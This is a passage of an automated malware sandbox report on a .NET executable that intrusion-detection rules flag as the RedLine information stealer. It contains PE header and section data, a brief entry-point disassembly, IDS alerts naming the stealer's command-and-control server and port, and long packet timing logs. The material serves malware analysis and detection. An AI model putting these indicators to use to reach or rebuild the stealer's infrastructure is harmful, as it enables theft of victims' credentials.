                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0xA8B6B2BE [Thu Sep 11 22:39:58 2059 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:4
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:4
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                  Instruction
                                                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                                                  popad
                                                                                                                                                  add byte ptr [ebp+00h], dh
                                                                                                                                                  je 00007F6970D5C312h
                                                                                                                                                  outsd
                                                                                                                                                  add byte ptr [esi+00h], ah
                                                                                                                                                  imul eax, dword ptr [eax], 006C006Ch
                                                                                                                                                  push eax
                                                                                                                                                  add byte ptr [edx+00h], dh
                                                                                                                                                  outsd
                                                                                                                                                  add byte ptr [esi+00h], ah
                                                                                                                                                  imul eax, dword ptr [eax], 0065006Ch
                                                                                                                                                  jnc 00007F6970D5C312h
                                                                                                                                                  push esp
                                                                                                                                                  add byte ptr [edi+00h], ch
                                                                                                                                                  je 00007F6970D5C312h
                                                                                                                                                  popad
                                                                                                                                                  add byte ptr [eax+eax+20h], ch
                                                                                                                                                  add byte ptr [edi+00h], ch
                                                                                                                                                  add byte ptr [eax], ah
                                                                                                                                                  add byte ptr [edx+00h], dl
                                                                                                                                                  inc ecx
                                                                                                                                                  add byte ptr [ebp+00h], cl
                                                                                                                                                  push esi
                                                                                                                                                  add byte ptr [eax+00h], dl
                                                                                                                                                  inc ebp
                                                                                                                                                  add byte ptr [esi+00h], ch
                                                                                                                                                  je 00007F6970D5C312h
                                                                                                                                                  imul eax, dword ptr [eax], 00790074h
                                                                                                                                                  xor dword ptr [eax], eax
                                                                                                                                                  xor al, byte ptr [eax]
                                                                                                                                                  dec esi
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [ecx+00h], al
                                                                                                                                                  jo 00007F6970D5C312h
                                                                                                                                                  jo 00007F6970D5C312h
                                                                                                                                                  inc esp
                                                                                                                                                  add byte ptr [ecx+00h], ah
                                                                                                                                                  je 00007F6970D5C312h
                                                                                                                                                  popad
                                                                                                                                                  add byte ptr [eax+eax+4Ch], bl
                                                                                                                                                  add byte ptr [edi+00h], ch
                                                                                                                                                  arpl word ptr [eax], ax
                                                                                                                                                  popad
                                                                                                                                                  add byte ptr [eax+eax+5Ch], ch
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [ebx+00h], bl
                                                                                                                                                  pop esi
                                                                                                                                                  add byte ptr [eax+eax+75h], bl
                                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                                  add byte ptr [edx], dh
                                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                                  add byte ptr [75005C00h], ch
                                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                                  add byte ptr [edi], dh
                                                                                                                                                  add byte ptr [esi+00h], al
                                                                                                                                                  pop ebp
                                                                                                                                                  add byte ptr [ebp+00h], dl
                                                                                                                                                  dec esi
                                                                                                                                                  add byte ptr [ebx+00h], cl
                                                                                                                                                  dec esi
                                                                                                                                                  add byte ptr [edi+00h], cl
                                                                                                                                                  push edi
                                                                                                                                                  add byte ptr [esi+00h], cl
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  dec esp
                                                                                                                                                  add byte ptr [edi+00h], ch
                                                                                                                                                  arpl word ptr [eax], ax
                                                                                                                                                  popad
                                                                                                                                                  add byte ptr [eax+eax+20h], ch
                                                                                                                                                  add byte ptr [ebx+00h], dl
                                                                                                                                                  je 00007F6970D5C312h
                                                                                                                                                  popad
                                                                                                                                                  add byte ptr [eax+eax+65h], dh
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax+00h], dl
                                                                                                                                                  jc 00007F6970D5C312h
                                                                                                                                                  outsd
                                                                                                                                                  add byte ptr [ebx+00h], ah
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x221340x4f.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000xab0.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x260000xc.reloc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x221180x1c.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x20000x20cdc0x21000False0.4308046283143939data5.900613718830563IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rsrc0x240000xab00xc00False0.55078125data5.12655465420944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0x260000xc0x400False0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                  RT_ICON0x241000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m
                                                                                                                                                  RT_GROUP_ICON0x245780x14data
                                                                                                                                                  RT_VERSION0x2459c0x314data
                                                                                                                                                  RT_MANIFEST0x248c00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                  DLLImport
                                                                                                                                                  mscoree.dll_CorExeMain
                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  37.139.128.203192.168.2.544588497062850353 11/15/22-18:54:18.080513TCP2850353ETPRO MALWARE Redline Stealer TCP CnC - Id1Response445884970637.139.128.203192.168.2.5
                                                                                                                                                  192.168.2.537.139.128.20349706445882850286 11/15/22-18:54:42.350080TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4970644588192.168.2.537.139.128.203
                                                                                                                                                  192.168.2.537.139.128.20349706445882850027 11/15/22-18:54:16.253696TCP2850027ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init4970644588192.168.2.537.139.128.203
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Nov 15, 2022 18:54:15.720006943 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:15.747142076 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:15.747328043 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:16.253695965 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:16.282315969 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:16.517959118 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:16.524518013 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:16.524776936 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:18.052165031 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:18.080513000 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:18.205616951 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:25.712501049 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:25.746932030 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:25.746965885 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:25.746984959 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:25.746999979 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:25.747083902 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:25.747129917 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:27.450134039 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:27.479743004 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:27.515165091 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:27.543193102 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:27.563071012 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:27.591253996 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:27.643860102 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:27.970398903 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:27.998068094 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:28.050192118 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:28.110964060 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:28.138932943 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:28.152239084 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:28.180284023 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:28.182393074 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:28.210177898 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:28.253305912 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:28.463809013 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:28.491594076 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:28.491624117 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:28.491945028 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:28.534627914 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:28.636751890 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:28.667059898 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:28.694993019 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:28.774578094 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:28.775527000 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:28.831507921 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:28.875361919 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:28.904798985 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:28.927824020 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:28.956195116 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:28.958965063 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:28.986934900 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:29.034574032 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:29.094958067 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:29.122163057 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:29.122890949 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:29.175220966 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:29.672952890 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:29.702476978 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:29.753446102 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:30.000587940 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:30.027807951 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:30.030806065 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:30.081664085 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:36.352984905 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:36.381449938 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:36.382165909 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:36.410134077 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:36.411854982 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:36.442935944 CET445884970637.139.128.203192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:36.516870022 CET4970644588192.168.2.537.139.128.203
                                                                                                                                                  Nov 15, 2022 18:54:37.213429928 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:37.213495016 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:37.213609934 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:37.299194098 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:37.299240112 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:37.354842901 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:37.354948044 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:37.359150887 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:37.359179020 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:37.359764099 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:37.410361052 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.383893967 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.383936882 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.431941032 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.431996107 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.432029963 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.432060003 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.432069063 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.432100058 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.432121992 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.432142973 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.432456970 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.432487965 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.432517052 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.432518005 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.432543039 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.432584047 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.432607889 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.432615995 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.433311939 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.433345079 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.433368921 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.433378935 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.433391094 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.433422089 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.434272051 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.434312105 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.434350014 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.434369087 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.434413910 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.434870958 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.434940100 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.434971094 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.435029030 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.435041904 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.435286045 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.435652018 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.435724020 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.435755014 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.435806036 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.435817957 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.435864925 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.436422110 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.436479092 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.436506033 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.436557055 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.436568975 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.436609983 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.448813915 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.448955059 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.448986053 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.449012041 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.449048042 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.449078083 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.449098110 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.449676991 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.449707031 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.449729919 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.449759960 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.449774981 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.449801922 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.450474024 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.450531960 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.450548887 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.451638937 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.451699972 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.451738119 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.451757908 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.451790094 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.451812983 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.452428102 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.452492952 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.452552080 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.452565908 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.452610016 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.453286886 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.453377962 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.454077005 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.454154968 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.454859018 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.454945087 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.455694914 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.455763102 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.456490993 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.456535101 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.456577063 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.456592083 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.456609964 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.456646919 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.457416058 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.457495928 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.465686083 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.465785027 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.466511965 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.466556072 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.466590881 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.466610909 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.466628075 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.466672897 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.467159033 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.467225075 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.467674017 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.467760086 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.468379974 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.468449116 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.468522072 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.468540907 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.468612909 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.469212055 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.469254017 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.469274998 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.469288111 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.469330072 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.469362974 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.470010042 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.470093966 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.470845938 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.470927954 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.471429110 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.471514940 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.471515894 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.471530914 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.471563101 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.471585989 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.472358942 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.472439051 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.473104000 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.473189116 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.473195076 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.473211050 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.473251104 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.473939896 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.473999023 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.474020958 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.474037886 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.474066019 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.475014925 CET44349707162.159.133.233192.168.2.5
                                                                                                                                                  Nov 15, 2022 18:54:38.475090027 CET49707443192.168.2.5162.159.133.233
                                                                                                                                                  Nov 15, 2022 18:54:38.475111008 CET44349707162.159.133.233192.168.2.5
